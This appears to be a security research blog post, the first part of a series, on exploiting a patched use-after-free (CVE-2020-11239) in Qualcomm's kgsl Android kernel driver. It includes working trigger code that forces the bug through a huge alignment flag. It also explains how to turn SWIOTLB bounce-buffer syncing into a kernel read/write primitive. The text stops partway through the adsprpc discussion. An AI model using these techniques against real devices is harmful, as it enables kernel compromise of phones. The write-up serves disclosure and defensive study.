One day short of a full chain: Part 1 — Android Kernel arbitrary code execution

Original text by Man Yue Mo

In this series of posts, I’ll exploit three bugs that I reported last year: a use-after-free in the renderer of Chrome, a Chromium sandbox escape that was reported and fixed while it was still in beta, and a use-after-free in the Qualcomm msm kernel. Together, these three bugs form an exploit chain that allows remote kernel code execution by visiting a malicious website in the beta version of Chrome. While the full chain itself only affects the beta version of Chrome, both the renderer RCE and the kernel code execution existed in stable versions of the respective software. All of these bugs have been patched for quite some time, with the last one patched on the first of January.

Vulnerabilities used in the series

The three vulnerabilities that I’m going to use are the following. To achieve arbitrary kernel code execution from a compromised beta version of Chrome, I’ll use CVE-2020-11239, a use-after-free in the kgsl driver in the Qualcomm msm kernel. This vulnerability was reported in July 2020 to the Android security team as A-161544755 (GHSL-2020-375) and was patched in the January Bulletin. In the security bulletin, this bug was mistakenly associated with A-168722551, although the Android security team has since confirmed that they will acknowledge me as the original reporter of the issue. (However, the acknowledgement page had not been updated to reflect this at the time of writing.) For compromising Chrome, I’ll use CVE-2020-15972, a use-after-free in web audio, to trigger a renderer RCE. This is a duplicate bug, which an anonymous researcher reported about three weeks before I reported it as 1125635 (GHSL-2020-167). To escape the Chrome sandbox and gain control of the browser process, I’ll use CVE-2020-16045, which was reported as 1125614 (GHSL-2020-165). While the exploit uses a component that was only enabled in the beta version of Chrome, the bug would probably have made it into the stable version and been exploitable had it not been reported. Interestingly, the renderer bug CVE-2020-15972 was fixed in version 86.0.4240.75, the same version in which the sandbox escape bug would have made it into the stable version of Chrome (had it not been reported), so these two bugs literally missed each other by one day to form a stable full chain.

Qualcomm kernel vulnerability

The vulnerability used in this post is a use-after-free in the kernel graphics support layer (kgsl) driver. This driver provides an interface for userland apps to communicate with the Adreno gpu (the gpu used on Qualcomm’s snapdragon chipset). As apps need to access this driver to render themselves, this is one of the few drivers that can be reached from third-party applications on all phones that use Qualcomm chipsets. The vulnerability itself can be triggered on all of these phones running kernel version 4.14 or above, which should be the case for many mid-to-high-end phones released after late 2019, for example, the Pixel 4, Samsung Galaxy S10, S20, and A71. The exploit in this post, however, could not be launched directly from a third-party app on the Pixel 4 due to further SELinux restrictions, but it can be launched from third-party apps on Samsung phones and possibly some others as well. The exploit in this post was largely developed on a Pixel 4 running AOSP built from source and then adapted to a Samsung Galaxy A71. With some parameter adjustments, it should probably also work on flagship models like the Samsung Galaxy S10 and S20 (Snapdragon versions), although I don’t have those phones and have not tried it out myself.

The vulnerability here concerns the ioctl calls IOCTL_KGSL_GPUOBJ_IMPORT and IOCTL_KGSL_MAP_USER_MEM. These calls are used by apps to create shared memory between themselves and the kgsl driver.

When using these calls, the caller specifies a user space address in their process, the size of the shared memory, as well as the type of memory objects to create. After a successful ioctl call, the kgsl driver maps the user supplied memory into the gpu’s memory space, making it accessible to the gpu. Depending on the type of memory specified in the ioctl call parameters, different mechanisms are used by the kernel to map and access the user space memory.

The first type of memory is KGSL_USER_MEM_TYPE_ADDR, which asks kgsl to pin the supplied user memory and perform direct I/O on it (see, for example, the Performing Direct I/O section here). The caller can also specify the memory type to be KGSL_USER_MEM_TYPE_ION, which uses a direct memory access (DMA) buffer (see, for example, the Direct Memory Access section here) allocated by the ion allocator, allowing the gpu to access the DMA buffer directly. We’ll look at the DMA buffer a bit more later, as it is important to both the vulnerability and the exploit; for now, we just need to know that there are two different types of memory objects that can be created from these ioctl calls. When using these ioctls, a kgsl_mem_entry object will first be created, and then the type of memory is checked to make sure that the kgsl_mem_entry is correctly populated. In a way, these ioctl calls act like constructors of kgsl_mem_entry:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
    ...
    entry = kgsl_mem_entry_create();
    ...
	if (param->type == KGSL_USER_MEM_TYPE_ADDR)
		ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
			entry, param);
    //KGSL_USER_MEM_TYPE_ION is translated to KGSL_USER_MEM_TYPE_DMABUF
	else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
		ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
			entry, param, &fd);
	else
		ret = -ENOTSUPP;
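
From userspace, reaching this constructor looks roughly like the following sketch. It assumes the msm_kgsl.h UAPI header from the msm kernel tree is available and that a kgsl device file descriptor has already been opened; error handling is omitted.

#include <stdint.h>
#include <sys/ioctl.h>
#include "msm_kgsl.h"   /* UAPI header from the msm kernel tree */

/* Sketch: import user memory into the gpu as a
 * KGSL_USER_MEM_TYPE_ADDR object. Error handling omitted. */
int import_user_memory(int kgsl_fd, void *addr)
{
	struct kgsl_gpuobj_import_useraddr useraddr = {
		.virtaddr = (uint64_t)(uintptr_t)addr,
	};
	struct kgsl_gpuobj_import import = {
		.priv = (uint64_t)(uintptr_t)&useraddr,
		.priv_len = sizeof(useraddr),
		.flags = 0,
		.type = KGSL_USER_MEM_TYPE_ADDR,
	};
	return ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_IMPORT, &import);
}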

In particular, when creating a kgsl_mem_entry with DMA type memory, the user supplied DMA buffer will be "attached" to the gpu, which will then allow the gpu to share the DMA buffer. The general process of sharing a DMA buffer with a device on Android looks like this (a minimal userspace sketch of the user’s side follows the list):

  1. The user creates a DMA buffer using the ion allocator. On Android, ion is the concrete implementation of DMA buffers, so sometimes the terms are used interchangeably, as in the kgsl code here, in which KGSL_USER_MEM_TYPE_DMABUF and KGSL_USER_MEM_TYPE_ION refer to the same thing.
  2. The ion allocator will then allocate memory from the ion heap, which is a special region of memory separate from the heap used by the kmalloc family of calls. I’ll cover more about the ion heap later in the post.
  3. The ion allocator will return a file descriptor to the user, which is used as a handle to the DMA buffer.
  4. The user can then pass this file descriptor to the device via an appropriate ioctl call.
  5. The device then obtains the DMA buffer from the file descriptor via dma_buf_get and uses dma_buf_attach to attach it to itself.
  6. The device uses dma_buf_map_attachment to obtain the sg_table of the DMA buffer, which contains the locations and sizes of the backing stores of the DMA buffer. It can then use it to access the buffer.
  7. After this, both the device and the user can access the DMA buffer. This means that the buffer can now be modified by both the cpu (by the user) and the device, so care must be taken to synchronize the cpu view of the buffer and the device view of the buffer. (For example, the cpu may cache the content of the DMA buffer, and the device may then modify its content, leaving stale data in the cpu (user) view.) To do this, the user can use the DMA_BUF_IOCTL_SYNC call of the DMA buffer to synchronize the different views of the buffer before and after accessing it.
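
The user’s side of steps one to four and seven might look like the following sketch. The ion header path and the system heap id are assumptions that depend on the device’s kernel tree (on msm trees the system heap id is typically 25 and can be discovered with ION_IOC_HEAP_QUERY); error handling is omitted.

#include <fcntl.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <linux/dma-buf.h>      /* struct dma_buf_sync, DMA_BUF_IOCTL_SYNC */
#include "ion.h"                /* 4.12+ ion UAPI: struct ion_allocation_data */

#define SYSTEM_HEAP_ID 25       /* assumption; query with ION_IOC_HEAP_QUERY */

/* Sketch: allocate a DMA buffer from the ion system heap (steps 1-3)
 * and bracket cpu accesses with DMA_BUF_IOCTL_SYNC (step 7). */
int alloc_and_sync(void)
{
	int ion_fd = open("/dev/ion", O_RDONLY);
	struct ion_allocation_data alloc = {
		.len = 0x1000,
		.heap_id_mask = 1u << SYSTEM_HEAP_ID,
		.flags = 0,
	};
	ioctl(ion_fd, ION_IOC_ALLOC, &alloc);
	int buf_fd = alloc.fd;      /* file descriptor handle to the DMA buffer */

	/* ... step 4: pass buf_fd to the device via an appropriate ioctl ... */

	struct dma_buf_sync sync = { .flags = DMA_BUF_SYNC_START | DMA_BUF_SYNC_RW };
	ioctl(buf_fd, DMA_BUF_IOCTL_SYNC, &sync);   /* before cpu access */
	/* ... read or write the mmap'ed buffer ... */
	sync.flags = DMA_BUF_SYNC_END | DMA_BUF_SYNC_RW;
	ioctl(buf_fd, DMA_BUF_IOCTL_SYNC, &sync);   /* after cpu access */
	return buf_fd;
}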

When the device is done with the shared buffer, it is important to call the functions dma_buf_unmap_attachment, dma_buf_detach, and dma_buf_put to perform the appropriate clean up.
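
Inside a driver, the attach half (steps five and six) and this clean up pair up as in the following fragment, simplified from the pattern used by drivers such as kgsl; error checks are omitted. As we’ll see, the bug comes precisely from one path skipping the detach half of this pairing.

#include <linux/dma-buf.h>

/* Sketch of the device-side pairing: attach and map (steps 5-6),
 * then clean up in reverse order when done. */
static void device_use_dmabuf(struct device *dev, int fd)
{
	struct dma_buf *dmabuf = dma_buf_get(fd);                  /* step 5 */
	struct dma_buf_attachment *attach = dma_buf_attach(dmabuf, dev);
	struct sg_table *sgt = dma_buf_map_attachment(attach, DMA_BIDIRECTIONAL); /* step 6 */

	/* ... use sgt->sgl to program the device's mappings ... */

	dma_buf_unmap_attachment(attach, sgt, DMA_BIDIRECTIONAL);
	dma_buf_detach(dmabuf, attach);
	dma_buf_put(dmabuf);
}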

In the case of sharing a DMA buffer with the kgsl driver, the sg_table that belongs to the DMA buffer will be stored in the kgsl_mem_entry as the field sgt:

static int kgsl_setup_dma_buf(struct kgsl_device *device,
				struct kgsl_pagetable *pagetable,
				struct kgsl_mem_entry *entry,
				struct dma_buf *dmabuf)
{
    ...
	sg_table = dma_buf_map_attachment(attach, DMA_TO_DEVICE);
    ...
	meta->table = sg_table;
	entry->priv_data = meta;
	entry->memdesc.sgt = sg_table;

On the other hand, in the case of a MAP_USER_MEM type memory object, the sg_table in memdesc.sgt is created and owned by the kgsl_mem_entry:

static int memdesc_sg_virt(struct kgsl_memdesc *memdesc, struct file *vmfile)
{
    ...
    //Creates an sg_table and stores it in memdesc->sgt
	ret = sg_alloc_table_from_pages(memdesc->sgt, pages, npages,
					0, memdesc->size, GFP_KERNEL);

As such, care must be taken with the ownership of memdesc->sgt when a kgsl_mem_entry is destroyed. If the ioctl call somehow fails, the memory object that was created will have to be destroyed. Depending on the type of the memory, the clean up logic will be different:

unmap:
	if (param->type == KGSL_USER_MEM_TYPE_DMABUF) {
		kgsl_destroy_ion(entry->priv_data);
		entry->memdesc.sgt = NULL;
	}

	kgsl_sharedmem_free(&entry->memdesc);

If we created an ION type memory object, then apart from the extra clean up that detaches the gpu from the DMA buffer, entry->memdesc.sgt is set to NULL before entering kgsl_sharedmem_free, so that kgsl_sharedmem_free will not free the sg_table, which is owned by the DMA buffer:

void kgsl_sharedmem_free(struct kgsl_memdesc *memdesc)
{
    ...
	if (memdesc->sgt) {
		sg_free_table(memdesc->sgt);
		kfree(memdesc->sgt);
	}

	if (memdesc->pages)
		kgsl_free(memdesc->pages);
}

So far, so good: everything is taken care of. But a closer look reveals that, when creating a KGSL_USER_MEM_TYPE_ADDR object, the code first checks whether the user supplied address was allocated by the ion allocator, and if so, it creates an ION type memory object instead:

static int kgsl_setup_useraddr(struct kgsl_device *device,
		struct kgsl_pagetable *pagetable,
		struct kgsl_mem_entry *entry,
		unsigned long hostptr, size_t offset, size_t size)
{
    ...
 	/* Try to set up a dmabuf - if it returns -ENODEV assume anonymous */
	ret = kgsl_setup_dmabuf_useraddr(device, pagetable, entry, hostptr);
	if (ret != -ENODEV)
		return ret;

	/* Okay - lets go legacy */
	return kgsl_setup_anon_useraddr(pagetable, entry,
		hostptr, offset, size);
}

While there is nothing wrong with using a DMA mapping when the user supplied memory is actually a dma buffer (allocated by ion), if something goes wrong during the ioctl call, the clean up logic will be wrong and memdesc->sgt will be incorrectly deleted. Fortunately, before the ION ABI change introduced in the 4.12 kernel, the now freed sg_table could not be reached again. After this change, however, the sg_table gets added to the dma_buf_attachment when a DMA buffer is attached to a device, and the dma_buf_attachment is then stored in the DMA buffer.

static int ion_dma_buf_attach(struct dma_buf *dmabuf, struct device *dev,
                                struct dma_buf_attachment *attachment)
{
    ...
        table = dup_sg_table(buffer->sg_table);
    ...
        a->table = table;                          //<---- c. duplicated table stored in attachment, which is the output of dma_buf_attach in a.
    ...
        mutex_lock(&buffer->lock);
        list_add(&a->list, &buffer->attachments);  //<---- d. attachment got added to dma_buf::attachments
        mutex_unlock(&buffer->lock);
        return 0;
}

This attachment would normally be removed when the DMA buffer is detached from the device. However, because of the wrong clean up logic, the DMA buffer will never be detached in this case (kgsl_destroy_ion is not called), meaning that after the ioctl call fails, the user supplied DMA buffer will end up with an attachment that contains a free’d sg_table. This sg_table will then be used any time the DMA_BUF_IOCTL_SYNC ioctl is called on the buffer:

static int __ion_dma_buf_begin_cpu_access(struct dma_buf *dmabuf,
                                          enum dma_data_direction direction,
                                          bool sync_only_mapped)
{
    ...
        list_for_each_entry(a, &buffer->attachments, list) {
        ...
                if (sync_only_mapped)
                        tmp = ion_sgl_sync_mapped(a->dev, a->table->sgl,        //<--- use-after-free of a->table
                                                  a->table->nents,
                                                  &buffer->vmas,
                                                  direction, true);
                else
                        dma_sync_sg_for_cpu(a->dev, a->table->sgl,              //<--- use-after-free of a->table
                                            a->table->nents, direction);
            ...
                }
        }
...
}

There are actually multiple paths in this ioctl that can lead to the use of the sg_table in different ways.

Getting a free’d object with a fake out-of-memory error

This looks like a very good use-after-free, as it allows me to hold onto a free’d object and use it at any convenient time, and in different ways. To trigger it, however, I first need to cause the IOCTL_KGSL_GPUOBJ_IMPORT or IOCTL_KGSL_MAP_USER_MEM call to fail, and to fail at the right place. The only place where a use-after-free can happen in the IOCTL_KGSL_GPUOBJ_IMPORT call is when it fails at kgsl_mem_entry_attach_process:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
    ...
	kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);
	if (param->type == KGSL_USER_MEM_TYPE_ADDR)
		ret = _gpuobj_map_useraddr(dev_priv->device, private->pagetable,
			entry, param);
	else if (param->type == KGSL_USER_MEM_TYPE_DMABUF)
		ret = _gpuobj_map_dma_buf(dev_priv->device, private->pagetable,
			entry, param, &fd);
	else
		ret = -ENOTSUPP;

	if (ret)
		goto out;

    ...
	ret = kgsl_mem_entry_attach_process(dev_priv->device, private, entry);
	if (ret)
		goto unmap;

This is the last point where the call can fail; any earlier failure will not result in kgsl_sharedmem_free being called. One way this can fail is if kgsl_mem_entry_track_gpuaddr fails to reserve memory in the gpu due to an out-of-memory error:

static int kgsl_mem_entry_attach_process(struct kgsl_device *device,
		struct kgsl_process_private *process,
		struct kgsl_mem_entry *entry)
{
    ...
	ret = kgsl_mem_entry_track_gpuaddr(device, process, entry);
	if (ret) {
		kgsl_process_private_put(process);
		return ret;
	}

Of course, actually causing an out-of-memory error would be rather difficult and unreliable, as well as risking crashing the device by exhausting its memory.

Let’s look at how a user provided address is mapped to a gpu address in kgsl_iommu_get_gpuaddr, which is called by kgsl_mem_entry_track_gpuaddr. (Note that these are actually user space gpu addresses, in the sense that the gpu uses them together with a user process specific pagetable to resolve the actual addresses. Different processes can therefore have the same gpu address resolving to different actual locations, in the same way that user space addresses can be the same in different processes but resolve to different locations.) We see that an alignment parameter is taken from the flags of the kgsl_memdesc:

static int kgsl_iommu_get_gpuaddr(struct kgsl_pagetable *pagetable,
		struct kgsl_memdesc *memdesc)
{
    ...
	unsigned int align;
    ...
    //Uses `memdesc->flags` to compute the alignment parameter
	align = max_t(uint64_t, 1 << kgsl_memdesc_get_align(memdesc),
			memdesc->pad_to);
...

and the flags of memdesc is taken from the flags parameter when the ioctl is called:

long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
		unsigned int cmd, void *data)
{
    ...
	kgsl_memdesc_init(dev_priv->device, &entry->memdesc, param->flags);

When mapping memory to the gpu, this align value will be used to ensure that the memory is mapped to a gpu address that is aligned to (i.e. a multiple of) align. In particular, the gpu address will be the next multiple of align that is not already occupied. If no such value exists, then an out-of-memory error will occur. So by using a large align value in the ioctl call, I can easily use up all the addresses that are aligned to the value that I specified. For example, if I set align to 1 << 31, then there will only be two addresses that align with it (0 and 1 << 31). So after just mapping one memory object (which can be as small as 4096 bytes), I’ll get an out-of-memory error the next time I use the ioctl call. This will then give me a free’d sg_table in the DMA buffer. By allocating another object of similar size in the kernel, I can then replace this sg_table with an object that I control. I’ll go through the details of how to do this later, but for now, let’s assume I am able to do this and have complete control of all the fields in this sg_table, and see what this bug potentially allows me to do.
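
As a sketch, provoking the failure might look like the following. It assumes, per the snippet above, that the KGSL_MEMALIGN_* macros from msm_kgsl.h encode the log2 of the requested alignment in the flags field, and that the imported address is backed by an ion mapping so that the buggy DMA clean up path is taken.

#include <stdint.h>
#include <sys/ioctl.h>
#include "msm_kgsl.h"

/* Sketch: request a 1 << 31 gpu address alignment via the
 * KGSL_MEMALIGN bits of `flags`. The first import succeeds and occupies
 * an aligned gpu address; the second fails in
 * kgsl_mem_entry_attach_process, triggering the buggy clean up. */
static int import_with_huge_align(int kgsl_fd, uint64_t ion_backed_addr)
{
	struct kgsl_gpuobj_import_useraddr useraddr = {
		.virtaddr = ion_backed_addr,   /* must be an ion (dma-buf) mapping */
	};
	struct kgsl_gpuobj_import import = {
		.priv = (uint64_t)(uintptr_t)&useraddr,
		.priv_len = sizeof(useraddr),
		/* 31 = log2 of the requested alignment */
		.flags = (31ULL << KGSL_MEMALIGN_SHIFT) & KGSL_MEMALIGN_MASK,
		.type = KGSL_USER_MEM_TYPE_ADDR,
	};
	return ioctl(kgsl_fd, IOCTL_KGSL_GPUOBJ_IMPORT, &import);
}

Calling this twice should see the second call fail with an out-of-memory error, leaving the free’d sg_table reachable through the DMA buffer’s attachment.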

The primitives of the vulnerability

As mentioned before, there are different ways to use the free’d sg_table via the DMA_BUF_IOCTL_SYNC ioctl call:

static long dma_buf_ioctl(struct file *file,
			  unsigned int cmd, unsigned long arg)
{
    ...
	switch (cmd) {
	case DMA_BUF_IOCTL_SYNC:
        ...
		if (sync.flags & DMA_BUF_SYNC_END)
			if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
				ret = dma_buf_end_cpu_access_umapped(dmabuf,
								     dir);
			else
				ret = dma_buf_end_cpu_access(dmabuf, dir);
		else
			if (sync.flags & DMA_BUF_SYNC_USER_MAPPED)
				ret = dma_buf_begin_cpu_access_umapped(dmabuf,
								       dir);
			else
				ret = dma_buf_begin_cpu_access(dmabuf, dir);

		return ret;

These end up calling the functions __ion_dma_buf_begin_cpu_access or __ion_dma_buf_end_cpu_access, which provide the concrete implementations.

As explained before, the DMA_BUF_IOCTL_SYNC call is meant to synchronize the cpu view of the DMA buffer and the device (in this case, gpu) view of the DMA buffer. For the kgsl device, the synchronization is implemented in lib/swiotlb.c. The various different ways of syncing the buffer will more or less follow a code path like this:

  1. The scatterlist in the free’d sg_table is iterated in a loop;
  2. In each iteration, the dma_address and dma_length of the scatterlist are used to identify the location and size of the memory for synchronization.
  3. The function swiotlb_sync_single is called to perform the actual synchronization of the memory.

So what does swiotlb_sync_single do? It first checks whether the dma_address (dev_addr; dma_to_phys for kgsl is just the identity function) in the scatterlist is an address of a swiotlb_buffer using the is_swiotlb_buffer function. If so, it calls swiotlb_tbl_sync_single; otherwise, it calls dma_mark_clean.

static void
swiotlb_sync_single(struct device *hwdev, dma_addr_t dev_addr,
		    size_t size, enum dma_data_direction dir,
		    enum dma_sync_target target)
{
	phys_addr_t paddr = dma_to_phys(hwdev, dev_addr);

	BUG_ON(dir == DMA_NONE);

	if (is_swiotlb_buffer(paddr)) {
		swiotlb_tbl_sync_single(hwdev, paddr, size, dir, target);
		return;
	}

	if (dir != DMA_FROM_DEVICE)
		return;

	dma_mark_clean(phys_to_virt(paddr), size);
}

The function dma_mark_clean simply flushes the cpu cache that corresponds to dev_addr and keeps the cpu cache in sync with the actual memory. I wasn’t able to exploit this path and so I’ll concentrate on the swiotlb_tbl_sync_single path.

void swiotlb_tbl_sync_single(struct device *hwdev, phys_addr_t tlb_addr,
			     size_t size, enum dma_data_direction dir,
			     enum dma_sync_target target)
{
	int index = (tlb_addr - io_tlb_start) >> IO_TLB_SHIFT;
	phys_addr_t orig_addr = io_tlb_orig_addr[index];

	if (orig_addr == INVALID_PHYS_ADDR)                            //<--------- a. checks address valid
		return;
	orig_addr += (unsigned long)tlb_addr & ((1 << IO_TLB_SHIFT) - 1);

	switch (target) {
	case SYNC_FOR_CPU:
		if (likely(dir == DMA_FROM_DEVICE || dir == DMA_BIDIRECTIONAL))
			swiotlb_bounce(orig_addr, tlb_addr,
				       size, DMA_FROM_DEVICE);
    ...
}

After a further check of the address (tlb_addr) via a look up in the io_tlb_orig_addr array, the function swiotlb_bounce is called.

static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
			   size_t size, enum dma_data_direction dir)
{
    ...
	unsigned char *vaddr = phys_to_virt(tlb_addr);
	if (PageHighMem(pfn_to_page(pfn))) {
        ...

		while (size) {
			sz = min_t(size_t, PAGE_SIZE - offset, size);

			local_irq_save(flags);
			buffer = kmap_atomic(pfn_to_page(pfn));
			if (dir == DMA_TO_DEVICE)
				memcpy(vaddr, buffer + offset, sz);
			else
				memcpy(buffer + offset, vaddr, sz);
            ...
		}
	} else if (dir == DMA_TO_DEVICE) {
		memcpy(vaddr, phys_to_virt(orig_addr), size);
	} else {
		memcpy(phys_to_virt(orig_addr), vaddr, size);
	}
}

As tlb_addr and size come from a scatterlist in the free’d sg_table, it becomes clear that I may be able to call a memcpy with a partially controlled source/destination (tlb_addr comes from the scatterlist but is constrained as it needs to pass some checks, while size is unchecked). This could potentially give me a very strong relative read/write primitive. The questions are:

  1. What is the swiotlb_buffer and is it possible to pass the is_swiotlb_buffer check without a separate info leak?
  2. What is the io_tlb_orig_addr and how to pass that test?
  3. How much control do I have over orig_addr, which comes from io_tlb_orig_addr?

The Software Input Output Translation Lookaside Buffer

The Software Input Output Translation Lookaside Buffer (SWIOTLB), sometimes known as the bounce buffer, is a memory region with a physical address below 32 bits. It seems to be very rarely used in modern Android phones, and as far as I can gather, there are two main uses of it:

  1. It is used when a DMA buffer that has a physical address higher than 32 bits is attached to a device that can only access 32 bit addresses. In this case, the SWIOTLB is used as a proxy of the DMA buffer to allow access to it from the device. This is the code path that we have been looking at. As this means an extra read/write operation between the DMA buffer and the SWIOTLB every time a synchronization between the device and DMA buffer happens, it is not ideal and is only used as a last resort.
  2. It is used as a layer of protection to prevent untrusted usb devices from accessing DMA memory directly (see here).

As the second usage likely involves plugging a usb device into the phone and thus requires physical access, I’ll only cover the first usage here, which will also answer the three questions in the previous section.

To begin with, let’s take a look at the location of the SWIOTLB. This is used by the check is_swiotlb_buffer to determine whether a physical address belongs to the SWIOTLB:

int is_swiotlb_buffer(phys_addr_t paddr)
{
	return paddr >= io_tlb_start && paddr < io_tlb_end;
}

The global variables io_tlb_start and io_tlb_end mark the range of the SWIOTLB. As mentioned before, the SWIOTLB needs to be at an address below 32 bits. How does the kernel guarantee this? By allocating the SWIOTLB very early during boot. From a rooted device, we can see that the SWIOTLB is allocated nearly right at the start of the boot. This is an excerpt of the kernel log during the early stage of booting a Pixel 4:

...
[    0.000000] c0      0 software IO TLB: swiotlb init: 00000000f3800000
[    0.000000] c0      0 software IO TLB: mapped [mem 0xf3800000-0xf3c00000] (4MB)
...

Here we see that io_tlb_start is 0xf3800000 while io_tlb_end is 0xf3c00000.

While allocating the SWIOTLB early makes sure that its address is below 32 bits, it also makes it predictable. In fact, the address only seems to depend on the amount of memory configured for the SWIOTLB, which is passed as the swiotlb boot parameter. For the Pixel 4, this is swiotlb=2048 (which seems to be a common parameter and is the same for the Galaxy S10 and S20) and will allocate 4MB of SWIOTLB (the allocation size is swiotlb × 2048 bytes). For the Samsung Galaxy A71, the parameter is set to swiotlb=1, which allocates the minimum amount of SWIOTLB (0x40000 bytes):

[    0.000000] software IO TLB: mapped [mem 0xfffbf000-0xfffff000] (0MB)

The SWIOTLB will be at this same location when changing swiotlb to 1 on the Pixel 4.

This provides us with a predictable location for the SWIOTLB to pass the is_swiotlb_buffer test.

Let’s take a look at io_tlb_orig_addr next. This is an array used for storing the addresses of DMA buffers that are attached to devices but whose addresses are too high for the device to access:

int
swiotlb_map_sg_attrs(struct device *hwdev, struct scatterlist *sgl, int nelems,
		     enum dma_data_direction dir, unsigned long attrs)
{
    ...
	for_each_sg(sgl, sg, nelems, i) {
		phys_addr_t paddr = sg_phys(sg);
		dma_addr_t dev_addr = phys_to_dma(hwdev, paddr);

		if (swiotlb_force == SWIOTLB_FORCE ||
		    !dma_capable(hwdev, dev_addr, sg->length)) {
            //device cannot access dev_addr, so use SWIOTLB as a proxy
			phys_addr_t map = map_single(hwdev, sg_phys(sg),
						     sg->length, dir, attrs);
             ...
}

In this case, map_single will store the address of the DMA buffer (dev_addr) in the io_tlb_orig_addr array. This means that if I can cause a SWIOTLB mapping to happen by attaching a DMA buffer with a high address to a device that cannot access it (!dma_capable), then the orig_addr in the memcpy of swiotlb_bounce will point to a DMA buffer that I control, which means I can read and write its content with complete control.

static void swiotlb_bounce(phys_addr_t orig_addr, phys_addr_t tlb_addr,
			   size_t size, enum dma_data_direction dir)
{
    ...
    //orig_addr is the address of a DMA buffer that uses the SWIOTLB mapping
	} else if (dir == DMA_TO_DEVICE) {
		memcpy(vaddr, phys_to_virt(orig_addr), size);
	} else {
		memcpy(phys_to_virt(orig_addr), vaddr, size);
	}
}

It now becomes clear that, if I can allocate a SWIOTLB, then I will be able to perform both reads and writes of a region behind the SWIOTLB region, with arbitrary size (and completely controlled content in the case of a write). This is what I’m going to use for the exploit in what follows.

To summarize, this is how synchronization works for a DMA buffer shared with a device when the implementation in lib/swiotlb.c is used.

When the device is capable of accessing the DMA buffer’s address, synchronization will involve flushing the cpu cache:

figure

When the device cannot access the DMA buffer directly, a SWIOTLB is created as an intermediate buffer to allow device access. In this case, the io_tlb_orig_addr array serves as a lookup table to locate the DMA buffer from the SWIOTLB.

figure

In the use-after-free scenario, I can control the size of the memcpy between the DMA buffer and SWIOTLB in the above figure and that turns into a read/write primitive:

figure

Provided I can control the scatterlist that specifies the location and size of the SWIOTLB, I can specify the size to be larger than the original DMA buffer to cause an out-of-bounds access (I still need to point to the SWIOTLB to pass the checks). Of course, it is no good to just cause an out-of-bounds access: I need to be able to read back the out-of-bounds data in the case of a read access, and to control the data that I write in the case of a write access. This issue will be addressed in the next section.

Allocating a Software Input Output Translation Lookaside Buffer

As it turns out, the SWIOTLB is actually very rarely used. For one reason or another, either because most devices are capable of reading 64 bit addresses, or because the DMA buffer synchronization is implemented with arm_smmu rather than swiotlb, I only managed to allocate a SWIOTLB using the adsprpc driver. The adsprpc driver is used for communicating with the DSP (digital signal processor), a separate processor on Qualcomm’s snapdragon chipset. The DSP and adsprpc are themselves a vast topic with many security implications, and they are out of the scope of this post.

Roughly speaking, the DSP is a specialized chip that is optimized for certain computationally intensive tasks such as image, video, audio processing and machine learning. The cpu can offload these tasks to the DSP to improve overall performance. However, as the DSP is a different processor altogether, an RPC mechanism is needed to pass data and instructions between the cpu and the DSP. This is what the adsprpc driver is for. It allows the kernel to communicate with the DSP (which is running on a separate kernel and OS altogether, so this is truly "remote") to invoke functions, allocate memory and retrieve results from the DSP.

While access to the adsprpc driver from third-party apps is not granted in the default SELinux settings, and as such I’m unable to use it on Google’s Pixel phones, it is still enabled on many different phones running Qualcomm’s snapdragon SoC (system on chip). For example, Samsung phones allow access to adsprpc from third-party apps, which allows the exploit in this post to be launched directly from a third-party app or from a compromised beta version of Chrome (or any other compromised app). On phones where adsprpc access is not allowed, such as the Pixel 4, an additional bug that compromises a service with access to adsprpc is required to launch this exploit. There are various services that can access the adsprpc driver and are reachable directly from third-party apps, such as hal_neuralnetworks, which is implemented as a closed source service in android.hardware.neuralnetworks@1.x-service-qti. I did not investigate this path, so I’ll assume Samsung phones in the rest of this post.

With adsprpc, the most obvious ioctl to use for allocating SWIOTLB is the FASTRPC_IOCTL_MMAP, which calls fastrpc_mmap_create to attach a DMA buffer that I supplied:

static int fastrpc_mmap_create(struct fastrpc_file *fl, int fd,
	unsigned int attr, uintptr_t va, size_t len, int mflags,
	struct fastrpc_mmap **ppmap)
{
    ...
	} else if (mflags == FASTRPC_DMAHANDLE_NOMAP) {
		VERIFY(err, !IS_ERR_OR_NULL(map->buf = dma_buf_get(fd)));
		if (err)
			goto bail;
		VERIFY(err, !dma_buf_get_flags(map->buf, &flags));
        ...
		map->attach->dma_map_attrs |= DMA_ATTR_SKIP_CPU_SYNC;
        ...

However, the call seems to always fail when fastrpc_mmap_on_dsp is called, which will then detach the DMA buffer from the adsprpc driver and remove the SWIOTLB that was just allocated. While it is possible to work with a temporary buffer like this by racing with multiple threads, it would be better if I could allocate a permanent SWIOTLB.

Another possibility is to use the get_args function, which will also invoke fastrpc_mmap_create:

static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)
{
    ...
	for (i = bufs; i < bufs + handles; i++) {
        ...
		if (ctx->attrs && (ctx->attrs[i] & FASTRPC_ATTR_NOMAP))
			dmaflags = FASTRPC_DMAHANDLE_NOMAP;
		VERIFY(err, !fastrpc_mmap_create(ctx->fl, ctx->fds[i],
				FASTRPC_ATTR_NOVA, 0, 0, dmaflags,
				&ctx->maps[i]));
        ...
	}

The get_args function is used in the various FASTRPC_IOCTL_INVOKE_* calls for passing arguments to invoke functions on the DSP. Under normal circumstances, a corresponding put_args will be called to detach the DMA buffer from the adsprpc driver. However, if the remote invocation fails, the call to put_args will be skipped and the clean up will be deferred to the time when the adsprpc file is closed:

static int fastrpc_internal_invoke(struct fastrpc_file *fl, uint32_t mode,
				   uint32_t kernel,
				   struct fastrpc_ioctl_invoke_crc *inv)
{
    ...
	if (REMOTE_SCALARS_LENGTH(ctx->sc)) {
		PERF(fl->profile, GET_COUNTER(perf_counter, PERF_GETARGS),
		VERIFY(err, 0 == get_args(kernel, ctx));                  //<----- get_args
		PERF_END);
		if (err)
			goto bail;
	}
    ...
 wait:
	if (kernel) {
      ....
	} else {
		interrupted = wait_for_completion_interruptible(&ctx->work);
